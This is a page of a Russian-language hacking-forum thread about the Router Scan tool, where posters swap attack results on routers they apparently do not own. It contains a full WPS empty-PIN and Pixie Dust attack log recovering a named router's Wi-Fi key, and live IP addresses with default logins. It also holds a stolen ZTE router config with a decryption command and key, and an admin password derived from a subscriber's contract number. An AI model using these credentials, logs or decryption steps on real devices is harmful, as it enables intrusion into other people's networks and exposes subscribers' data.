прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

Page 242 of 402
  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    да....я тут,я тут просто слежу за вами))
     
    #4821 СЕРЖ32, 31 Oct 2017
    erwerr2321, Payer and binarymaster like this.
  2. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    ну так а если на точке 80 порт выключен,толку сканить тогда....или этот роутер по другим каким то портам можно обнаружить?
     
    #4822 СЕРЖ32, 31 Oct 2017
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Иногда можно по другим - 8080, 1080, 161.

    Но бывает и так, что доступ из WAN закрыт в принципе.
     
    #4823 binarymaster, 31 Oct 2017
  4. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    ну,80,8080 и 1080 так у меня и забиты,161 не забит.что это за порт то,не веб морда же...
     
    #4824 СЕРЖ32, 31 Oct 2017
  5. russstand

    russstand Banned

    Joined:
    5 Jan 2013
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    вот такой ответ :(
     
    #4825 russstand, 31 Oct 2017
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Веб морды там бывают, как показывает практика.
    Ну всё логично:

    https://forum.antichat.ru/posts/4143320 (5 ответ)
     
    #4826 binarymaster, 31 Oct 2017
    Payer likes this.
  7. gurgen1

    gurgen1 Member

    Joined:
    25 Sep 2017
    Messages:
    64
    Likes Received:
    59
    Reputations:
    0
    #4827 gurgen1, 31 Oct 2017
  8. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    31.181.99.197:80 super:super не парсит. Отдаёт super:super:1K6ACAEO Realtek (QTECH QBR-1), или Seems to be Realtek Wireless Access Point, без авторизации.
    Archer C60 образец не нужен? У них одинаковые прошивки с С59, который уже добавлен.
     
    #4828 Pebenok70, 1 Nov 2017
    Last edited: 1 Nov 2017
  9. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,020
    Likes Received:
    3,349
    Reputations:
    72
    Каких только "ушлых" детей юзеров не бывает.
    Думает скрыться от РоутерСкана?
    Ан нет не уйдешь. Цоп цобе сюда иди.

    [​IMG]
    И вот хотя бы такая польза от антивиря Авира VPN на 500 метров
     
    #4829 Veil, 1 Nov 2017
    dragonking, USER_X, sha9 and 8 others like this.
  10. alaa ali

    alaa ali New Member

    Joined:
    2 Nov 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Hello world,
    i want add routerscan list ips : ports
    exmaple :-
    127.0.0.1:80
    127.0.0.2:779
    127.0.0.3:999
    i have many ports please help me
     
    #4830 alaa ali, 2 Nov 2017
  11. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Прошу добавить MAC уязвимый к пустому пину.
    ESSID: MTSRouter_4971D2
    BSSID:
    Code:
    94:A7:B7:49:71:D2
    Code:
    [*] Audit started.
[*] Associating with AP...
[+] Associated successfully.
[*] Trying pin "00000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Message M1.
[*] Manufacturer: ZTE Corporation
[*] Model Name: ZXHN H298N
[*] Model Number: ZXHN H298N
[*] Serial Number: 123456789012347
[*] Device Name: ADSL Modem/Router
[*] Sending WPS Message M2...
[*] Received WPS Message M3.
[*] This AP is potentially vulnerable to the "empty string" pin.
[*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
[*] Also in this case the pin can have two same halfs (e.g. 00000000).
[*] Sending WPS Message M4...
[*] Received WPS Message M5.
[+] First half found: 0000
[*] Sending WPS Message M6...
[*] Received WPS Message M5.
[*] Sending WPS Message M6...
[*] Received WPS Message M5.
[*] Sending WPS Message M6...
[-] Request timed out.
[*] Sending WPS Message M6...
[*] Audit stopped.
[*] Audit started.
[*] Associating with AP...
[+] Associated successfully.
[*] Skipping pin "" (wrong first half)
[*] Trying pin "12345670"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Message M1.
[*] E-Nonce: 0FF797195E62796710FF59DD4232C3CD
[*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
[*] Manufacturer: ZTE Corporation
[*] Model Name: ZXHN H298N
[*] Model Number: ZXHN H298N
[*] Serial Number: 123456789012347
[*] Device Name: ADSL Modem/Router
[*] Sending WPS Message M2...
[*] R-Nonce: 04C05DB3C6691D0E4956EA99081E638D
[*] PKR: 4BF226590448CBD43450681867CD706FE19E156B04502F61290DC1192DA8038226D48B36019B486340499E1BCF498AE039F0CFE8DB736B62EC603F4FB18F33481FB1E0EF6BC7520146B1DC709CD93A5E886524B1F2E5C7C4A6BBA7C19763DC47C51DF6CE9B0619C1AD10B65221BF5878FCD186321F7C36D50D17810E93352167083DB63AC61E3FF779FC0A98C5BD370C4D83CBBFDD775471C6953278C4868993A83D28A64E69F4D6A7626904F034F64306943AD67FCC74FEDFAD1E2D10C42B4B
[*] AuthKey: EBF1376FA22F3B8963235679817DDE15C0D21169F78E4B8336F6EBE6DBDE2003
[*] Received WPS Message M3.
[*] E-Hash1: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
[*] E-Hash2: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
[*] Sending WPS Message M4...
[*] Received WPS Message M5.
[+] First half found: 1234
[*] Sending WPS Message M6...
[*] Received WPS Message M5.
[*] Sending WPS Message M6...
[*] Received WPS Message M5.
[*] Sending WPS Message M6...
[-] Request timed out.
[*] Sending WPS Message M6...
[*] Received Identity Request.
[-] Request timed out.
[*] Sending WPS Message M6...
[*] Received Identity Request.
[-] Session timed out.
[*] Starting Pixie Dust attack...
[*] Mode: 3 (RTL819x)
[*] PSK1: 97FC09F3DC0F2CBEAA59BFCCA4E98902
[*] PSK2: 422D7C5B3D86D90EE5A9BB1BFEC4C19F
[*] E-S1: 0FF797195E62796710FF59DD4232C3CD
[*] E-S2: 0FF797195E62796710FF59DD4232C3CD
[+] WPS PIN: <empty>
[*] Reconnecting...
[*] Associating with AP...
[+] Associated successfully.
[*] Trying pin ""...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Message M1.
[*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
[*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
[*] Sending WPS Message M2...
[*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
[*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
[*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
[*] Received WPS Message M1.
[*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
[*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
[*] Sending WPS Message M2...
[*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
[*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
[*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
[*] Received WPS Message M3.
[*] E-Hash1: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
[*] E-Hash2: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
[*] Sending WPS Message M4...
[*] Received WPS Message M5.
[+] First half found: <empty>
[*] Sending WPS Message M6...
[*] Received WPS Message M7.
[*] Sending WSC NACK...
[*] Received Identity Request.
[-] Request timed out.
[*] Sending WSC NACK...
[*] Received Identity Request.
[-] Request timed out.
[*] Sending WSC NACK...
[*] Received Identity Request.
[-] Session timed out.
[+] WPS PIN: <empty>
[+] SSID: MTSRouter_4971D2
[+] Key: v5h3pruu
[+] Key Index: 1
[*] Audit stopped.
    Немного напортачил, экспериментируя.
    А можно добавить в лог, MAC устройства которое пытаются отаудитить? :)
    Иногда по запарке(если устройств в работе много), можно забыть его(MAC) сохранить.
     
    #4831 Kakoluk, 2 Nov 2017
    sha9, Mednik, CRACK211 and 3 others like this.
  12. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    FAST Wireless N Router FWR310 178.237.183.87:80 admin:admin не парсит у меня. Проверьте.
     
    #4832 Pebenok70, 2 Nov 2017
  13. LolipopR

    LolipopR New Member

    Joined:
    1 Oct 2017
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    делаю все в точности, но почему то выходит так.

    [*] Trying pin "00000000"...
     
    #4833 LolipopR, 2 Nov 2017
  14. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,050
    Likes Received:
    1,128
    Reputations:
    11
    В окне PinS создайте пустую строку. Просто нажмите enter
     
    #4834 CRACK211, 2 Nov 2017
  15. LolipopR

    LolipopR New Member

    Joined:
    1 Oct 2017
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    делал, не помогает.
     
    #4835 LolipopR, 2 Nov 2017
  16. Kozloff73

    Kozloff73 Member

    Joined:
    16 Jun 2009
    Messages:
    45
    Likes Received:
    46
    Reputations:
    0
    #4836 Kozloff73, 2 Nov 2017
  17. LolipopR

    LolipopR New Member

    Joined:
    1 Oct 2017
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    #4837 LolipopR, 2 Nov 2017
  18. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Угнал конфиг от ZTE ZXHN H298N(новые SIP роутеры MTS), hardware: 1.7, firmware: 1.1.6_MTS2T1 (тот самый, что уязвим к пустому пину).
    С юзерской учётки(админская не известна, но судя по всему есть) https://yadi.sk/d/H-VLirv13PNDxS.
    Огромная просьба(!), глянуть что получится расшифровать.
    Из 3-х в доступе, удалось залогинится только в одну морду(дефолт user:user).
    Изнутри(LAN) парсится частично(Use credentials).
    В таком виде:
    Code:
    "192.168.1.1";"80";"0";"Done";"user:user";"ZTE ZXHN H298N, hardware: 1.7, firmware: 1.1.6_MTS2T1";"";"";"98:13:33:4C:E6:B4";"MTSRouter_4CE6B4";"WPA2";"qt9buchk";"";"192.168.1.1";"255.255.255.0";"";"";"";"";"";"";""
    Скан портов устройства c WAN (даже из локального пула, того же провайдера, на том же диапазоне), ничего кроме ICMP не дал.
     
    #4838 Kakoluk, 3 Nov 2017
    sha9, binarymaster, hydra and 1 other person like this.
  19. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    http://rgho.st/6l5gKsTgy

    Поправил скрипт для расшифровки, т.к. в прошивке есть баг - ключ "Wj%2$CjM" передаётся в функцию sprintf, которая воспринимает "%2$C" как спецификатор формата
    Code:
    ./decode_zte_config.py config.bin config.xml --key Wj
     
    #4839 Felis-Sapiens, 3 Nov 2017
    Alex Hilgert, sha9, binarymaster and 3 others like this.
  20. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Проверил на доступных роутерах, учётка user:user включена только у одного(видимо, аппарат ресетили),
    и у него же рабочая(суперпользователь, со всеми правами) admin:30701088627, номер договора. :confused:
    Снаружи не простукиваются(со стороны LAN только 80 и 443 и 23), не въедешь(не зная договора). Пипец, броня. Ну хоть WPS-решето.
     
    #4840 Kakoluk, 3 Nov 2017
    Last edited: 28 Nov 2017
    binarymaster, sha9 and CRACK211 like this.
(You must log in or sign up to post here.)
Page 242 of 402
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.